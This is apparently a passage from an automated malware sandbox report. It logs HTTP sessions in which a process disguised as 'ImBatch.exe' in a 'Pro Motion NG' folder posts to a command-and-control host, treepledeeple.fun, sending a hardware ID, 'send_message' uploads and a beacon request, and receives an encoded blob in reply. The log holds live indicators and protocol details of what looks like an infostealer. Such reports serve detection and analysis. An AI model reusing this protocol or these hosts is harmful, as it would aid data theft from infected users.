{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2pDVnoYVzxBzeAYs33bzf9knD2SSyVhxEsVSzX%2B6YPMSOSNJLw%2BiUB45EOVRW%2FDBI2Qd40y8lVz53h5EW8lKmEh0xrjMcHUY27VbKfJwfSKFE%2BFfBnG4N7rLcwNldlZakDGGeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfd54989c330-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:36.204230070 CEST	569	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.5	49751	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:36.742427111 CEST	569	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:36.743036985 CEST	570	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:37.065356016 CEST	571	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=9kg1e53o9tpn9ed13ido82v4ue; expires=Tue, 09 Jan 2024 03:10:15 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:36 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XGZxTzhic6UHZU%2Bvxc9mVlecKSV5wIkrP5SU8%2FMdYCmOKlCBDfSytJ8o%2FBJVsZf0IILo%2FM%2F%2BXKh3nWafsUB4O%2FHVF0okeY4roLRZD6Qb4lNzRq9ve%2BrQyQQkfUxiYbRe3PeDww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfdadf31c44f-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:37.065373898 CEST	571	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.5	49752	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:37.290780067 CEST	572	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:37.291410923 CEST	573	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:37.660904884 CEST	574	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=aq1ujpj9anu35l8uneo8fft3uc; expires=Tue, 09 Jan 2024 03:10:16 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:37 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8tnkcB5eFXNhSivDJ4%2BAwJLo1oqjDdksnQ%2F64eeQZwFPb5scyckSAmTbUwYwRgx5kGngcQikKRlteyBV2ZckTTX%2F8wDdRgao%2FxaUQ4wx1YUjAwvNoEfvLmLsVQWF4towV4rsyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfde4be241de-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:37.660947084 CEST	574	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.5	49753	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:37.879481077 CEST	575	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:37.880105019 CEST	575	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:38.263145924 CEST	576	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ah8b6jjmt5s4iu34nkib0ce8pk; expires=Tue, 09 Jan 2024 03:10:17 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=axc5t%2BlEL3tV799ybdgqw0wo7UZWANgRkwtn9aieGA8bVnnX3uXLneGSoKE%2FyLsRmvSWs%2BT6UUdLm5qFgd5EpxqvWRyQm7iStV2ehjASTPNOp%2FVlLpN4a%2B%2BdV4fXBWaBhHIjMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfe1fd5f4356-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:38.263185978 CEST	576	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49723	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:19.761375904 CEST	337	OUT	POST /api HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: treepledeeple.fun Content-Length: 47 Cache-Control: no-cache Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4c 6c 6e 42 68 69 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=LlnBhi&j=default&ver=4.0
Sep 15, 2023 11:23:21.214493036 CEST	340	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=k55bfhmq1bmc7dadi3rlg6fdh4; expires=Tue, 09 Jan 2024 03:10:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ot45HQesAwML6ZxwB69k0w87R%2BzVA65pVx1sZCpMWr9kEl9lokG7k7cfrHDNIMq20EnNNVS2hl16Ustx%2FN7n0GUFYjJSR%2BmLMQOVgINoY3hIO%2FJk4JR2mP6WDkehjUj88xU2mQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf70b8ac4302-EWR Data Raw: 33 66 35 30 0d 0a 35 49 61 4b 31 71 61 67 6e 42 39 50 52 68 42 37 36 35 4a 34 49 76 71 6d 58 50 4f 48 45 67 51 58 5a 37 2f 6b 36 59 57 76 36 58 57 66 69 34 44 32 68 6f 43 38 50 54 6c 6b 4b 6c 76 66 76 6e 55 6f 32 6f 5a 38 30 36 56 68 59 54 56 64 6e 35 43 62 38 4d 72 46 65 4f 36 6d 71 76 61 47 67 76 31 37 62 58 77 77 48 59 72 2b 43 30 66 57 71 31 62 54 70 7a 49 6b 4e 51 4c 48 78 74 4f 6c 39 4f 52 2f 78 4b 61 71 39 6f 61 41 35 78 4a 46 5a 6a 42 62 79 37 4a 59 41 74 71 45 4f 5a 32 6c 4b 43 51 Data Ascii: 3f505IaK1qagnB9PRhB765J4IvqmXPOHEgQXZ7/k6YWv6XWfi4D2hoC8PTlkKlvfvnUo2oZ806VhYTVdn5Cb8MrFeO6mqvaGgv17bXwwHYr+C0fWq1bTpzIkNQLHxtOl9OR/xKaq9oaA5xJFZjBby7JYAtqEOZ2lKCQ
Sep 15, 2023 11:23:21.214575052 CEST	341	IN	Data Raw: 31 41 74 57 47 69 4f 6e 4e 69 42 36 4c 39 75 61 31 7a 73 7a 37 64 79 6f 6c 64 42 71 48 2f 78 31 48 6e 38 63 32 6e 65 35 2f 62 48 70 46 6b 2b 6e 6a 70 59 2f 4a 56 63 53 6d 71 76 61 45 78 65 59 39 64 57 59 79 4e 6f 37 6d 47 57 2b 62 31 54 66 52 69 Data Ascii: 1AtWGiOnNiB6L9ua1zsz7dyoldBqH/x1Hn8c2ne5/bHpFk+njpY/JVcSmqvaExeY9dWYyNo7mGW+b1TfRihgkN0efxMn4g+R/xKaq9oaA5xJFZjBby7JYAtqEOZ2lKCQ1CdSGgO3JixCL4euzx8/5dyMjdhWA/RxAn8A7g+B5anlFk+njpY/JVcSmqvaExeY9dWYyNo7mGW+b1TfRihgkN0efxMn4g+R/xKaq9oaA5xJFZjBby7
Sep 15, 2023 11:23:21.214663029 CEST	342	IN	Data Raw: 2b 44 42 79 30 2f 45 70 4f 4b 6d 77 63 7a 36 64 79 67 67 66 68 4f 4a 39 51 68 49 6e 73 4d 79 6d 65 42 2f 59 48 41 49 32 6f 32 49 39 64 2b 49 45 34 6a 6f 71 50 71 72 71 72 77 2f 62 32 59 77 57 38 75 79 57 6b 65 41 68 47 62 54 70 56 56 78 64 68 58 Data Ascii: +DBy0/EpOKmwcz6dyggfhOJ9QhInsMymeB/YHAI2o2I9d+IE4joqPqrqrw/b2YwW8uyWkeAhGbTpVVxdhXbhcuIpclVxKaq9tuMkRVvZjBby7IDL/CGfNOnMiQ3R52Bh6eVyVeG6uS/w8n1eSkkfxKH/hNMkMg5g+h1bn8M2IqG5N+IFsaqh9yGgLw/b2YwW8n3AgDAhn621kdFNWq1xMmlj8lVmaqH3IaAvD9vZmt24bJYAtqG
Sep 15, 2023 11:23:21.214745045 CEST	344	IN	Data Raw: 4f 34 75 65 39 31 73 48 79 63 79 6f 71 66 68 65 45 2b 68 6c 4e 32 49 70 52 2b 61 63 79 4a 44 64 48 6e 38 54 4a 70 38 71 54 56 39 36 6d 71 4a 6a 44 7a 39 42 32 49 53 4d 79 64 75 47 79 57 41 4c 61 68 6e 79 4f 71 78 38 4f 4e 30 65 66 78 4d 6d 6c 31 Data Ascii: O4ue91sHycyoqfheE+hlN2IpR+acyJDdHn8TJp8qTV96mqJjDz9B2ISMyduGyWALahnyOqx8ON0efxMml1OR/xKaq9oaAvD9tI35Z0bJaTJLIN5HsdW5+DNiHgOLOjRqJ7fq+x8z9cSEicxqb+BMA1qtW06cyJDdHn8TL4NXLT8SkybrJ1vltbUsaW8uyWALa23D+jRskNxyy7smlj8lVxKaq9MPOviVvZHEYhvMbTZ7NNpHjdW
Sep 15, 2023 11:23:21.214824915 CEST	345	IN	Data Raw: 2f 66 39 63 79 4d 6a 5a 46 6e 6d 6d 46 67 43 32 6f 5a 38 30 2f 6f 2b 44 52 70 74 74 73 54 4a 2f 71 4c 6a 56 63 53 6d 71 76 61 47 67 4c 77 39 4b 69 67 79 51 63 75 77 46 30 79 53 79 54 75 56 37 58 64 6c 64 41 6e 5a 69 34 62 6a 78 49 38 53 6c 50 62 Data Ascii: /f9cyMjZFnmmFgC2oZ80/o+DRpttsTJ/qLjVcSmqvaGgLw9KigyQcuwF0ySyTuV7XdldAnZi4bjxI8SlPbuusTN8HIhNnwcifxaDvesfNOnMiQ3R5/GjP+N01XG1f+0hK2WP29mMFvL71Qr96xR+Y4yJGxqtcTJpY/JVcSmqLPIgqY/bSt/C4X/GkGbwDWW43ZndgDeg43mzYcdgeziusnE+nsrZDx24bJYAtqGfNOnMGFtRYXE
Sep 15, 2023 11:23:21.214921951 CEST	346	IN	Data Raw: 6d 4d 46 76 4c 73 67 55 4f 39 36 78 38 30 36 63 79 4a 44 63 63 73 75 37 4a 70 59 2f 4a 56 63 53 6d 71 76 54 44 7a 72 34 6c 62 32 52 36 46 49 48 36 48 6b 65 56 77 7a 69 59 39 33 6c 6a 65 77 58 5a 6a 59 54 68 79 59 67 58 6c 4f 4c 73 76 4d 66 50 38 Data Ascii: mMFvLsgUO96x806cyJDccsu7JpY/JVcSmqvTDzr4lb2R6FIH6HkeVwziY93ljewXZjYThyYgXlOLsvMfP83MuIDJX5phYAtqGfNOnMiZyHZ3eyaf/hhmd6++lzoKRFW9mMFvLsgUO96x806cyJDccsu7JpY/JVcSmqvTDzr4lb2R2F5v7G0uTyjme4HpmegHeiIDmzoMai+rivc3F8nkqZDx24bJYAtqGfNOnMGFtRYXEy8zspj
Sep 15, 2023 11:23:21.215015888 CEST	348	IN	Data Raw: 6c 67 43 32 6f 59 6e 2f 6f 30 79 4a 44 64 48 6e 38 54 4a 70 59 32 4d 47 38 61 38 71 76 54 45 77 2f 4e 76 4b 43 56 34 45 34 54 34 46 55 57 64 79 7a 71 56 37 6e 35 30 65 77 72 64 67 49 44 6d 79 49 67 63 6a 4f 72 68 70 6f 53 4d 6b 52 56 76 5a 6a 42 Data Ascii: lgC2oYn/o0yJDdHn8TJpY2MG8a8qvTEw/NvKCV4E4T4FUWdyzqV7n50ewrdgIDmyIgcjOrhpoSMkRVvZjBby7JYAtjDJtG9MiZfHtyLh6XjgAGBpsm6z8Xya21LGlvLslgC2ttw/o0yJDdHn8SSiKXJVcSmqvaGgL56IWQqW8n5FEybwzaZ4HBtdQrXiIz1x4cdlOvrucDP9HgkNncQj7BUL/CGfNOnMiQ3R52Bk6eVyVe+7+aG
Sep 15, 2023 11:23:21.215152979 CEST	349	IN	Data Raw: 38 30 36 64 70 43 52 31 48 6e 38 54 4a 70 59 2f 4a 56 63 62 6a 35 50 53 63 67 4c 35 32 49 79 46 7a 46 59 50 33 46 46 4b 5a 7a 6a 4b 51 34 6e 64 74 5a 77 37 50 6a 59 50 6b 77 34 4d 65 68 75 72 6f 74 63 6e 43 76 6a 4e 43 54 44 42 62 79 37 4a 59 41 Data Ascii: 806dpCR1Hn8TJpY/JVcbj5PScgL52IyFzFYP3FFKZzjKQ4ndtZw7PjYPkw4MehurotcnCvjNCTDBby7JYAtqGfpb9MD43RfilnPHHyTSR8uKzyNT1fC4yfwnJn3IC2oZ806dvKBptn8TJpY/JDumMqvaGgLw/b2YyHoWwQgLYzzGf6HtifADVhY7ix4cbh+zhvsHH+HcuKn0YhfQTTpGEcP6NMiQ3R5/EyaWNjA/GvKr08tL5ZS
Sep 15, 2023 11:23:21.215226889 CEST	350	IN	Data Raw: 6a 64 56 6b 2b 6e 6a 70 59 2f 4a 56 63 53 6d 71 76 61 45 78 75 38 39 64 57 59 69 53 39 4b 6c 53 52 66 49 6c 6c 48 35 70 7a 49 6b 4e 30 65 66 6d 63 57 49 70 63 6c 56 78 4b 61 71 39 74 32 74 6c 6a 39 76 5a 6a 42 62 79 37 4a 59 41 49 36 45 5a 74 4f Data Ascii: jdVk+njpY/JVcSmqvaExu89dWYiS9KlSRfIllH5pzIkN0efmcWIpclVxKaq9t2tlj9vZjBby7JYAI6EZtO3PgkdR5/EyaWPyVXG9qjshoK5fj82dBqf811+puo5l+B3djcr1pKMp4Pkf8SmqvaGgLw/bSsyQcvJWgjY+3D+jTIkN0efxMmljZNX3qaogcfM8Ho7NT83jvYfR4iGEJrxdyY7arXEyaWPyVXEpqiyhJq8LWNLGlvL
Sep 15, 2023 11:23:21.215301037 CEST	352	IN	Data Raw: 5a 69 4b 58 4a 56 63 53 6d 71 76 62 62 6a 4a 45 56 62 32 59 77 57 38 75 79 41 79 2f 77 68 6e 7a 54 70 7a 49 6b 4e 30 65 64 6b 4d 75 2f 6a 39 6c 5a 36 59 79 71 39 6f 61 41 76 44 39 76 5a 6a 49 4c 79 61 68 59 41 4e 2f 48 4c 49 50 6a 63 33 42 32 51 Data Ascii: ZiKXJVcSmqvbbjJEVb2YwW8uyAy/whnzTpzIkN0edkMu/j9lZ6Yyq9oaAvD9vZjILyahYAN/HLIPjc3B2QuO4iurCxxmN5O+k0tmydS4+aCe32xZGn945l8NQJjtqtcTJpY/JVcSmqLuEmrxEbWw+F47kHU6exH6uqx8ON0efxMmlj8lXnqSw9oT3/XMjI2QIxNg5eqKGEpbwMlJyFcyNhuuNxXjupqr2hoC8P29kdFnRskoO96
Sep 15, 2023 11:23:21.215462923 CEST	353	IN	Data Raw: 63 53 6d 71 76 61 45 30 4c 34 6c 62 32 51 31 44 70 6a 33 43 6c 4b 49 79 54 71 61 36 33 63 68 4e 55 75 79 37 73 6d 6c 6a 38 6c 56 78 4b 61 71 39 4d 75 43 70 6a 38 55 5a 44 70 56 67 50 41 63 57 74 6a 37 63 50 36 4e 4d 69 51 33 52 35 2f 45 79 61 57 Data Ascii: cSmqvaE0L4lb2Q1Dpj3ClKIyTqa63chNUuy7smlj8lVxKaq9MuCpj8UZDpVgPAcWtj7cP6NMiQ3R5/EyaWNk1fepqiX1tDwdiwnZBKE/AsNscM5o+ZhdzVLsu7JpY/JVcSmqvTCgqY/fWodccuyWALahnzTpXR3NV2f1tm8mNhA1raH3IaAvD9vZm1X5phYAtqGfNP8Hw43R5/EyaWPyVeQpLD2loyRFW9mMFvLslgC2NZ+yacw

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.5	49754	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:38.478522062 CEST	577	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:38.479142904 CEST	578	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:38.825108051 CEST	579	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=dk5fg7g6op3gi34mdesgc6ogku; expires=Tue, 09 Jan 2024 03:10:17 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tkDgxvu9Pu3IK3hLRsR8Y0xNK77qq4gHhqYu9vlj8bP%2BWoF1ZreNxIzHmtNpsq92IIG%2FkoJNO2XLqSDgcIIJi8BuuQWCcoE4vyh37feGg917x%2BE2rOjRK880qrvOe8OwckYyjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfe5bbc0c45e-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:38.825172901 CEST	579	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.5	49755	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:49.309616089 CEST	580	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:49.310206890 CEST	581	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:49.621671915 CEST	582	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=h9h3v8c1dump81il88ceq68u54; expires=Tue, 09 Jan 2024 03:10:28 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:49 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ysj4KD4TE64d784h9%2Bn4g2CZXI8d9Is%2B9qIWaulEezRge4vgJQO%2BXC%2BAiXb10cuV0%2BgP%2BdA6Faj%2BoEl3VxgYvC6yIJiVbwO3tE9Iq4C4AB%2FfdA9P2H16gUBYsi3uSiq9lxzcig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd0296ad74246-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:49.621694088 CEST	582	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	49756	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:49.876732111 CEST	583	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:49.877737045 CEST	584	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:50.192888021 CEST	585	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=s25ip7526cnopklvtu2c8s1i4s; expires=Tue, 09 Jan 2024 03:10:29 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: 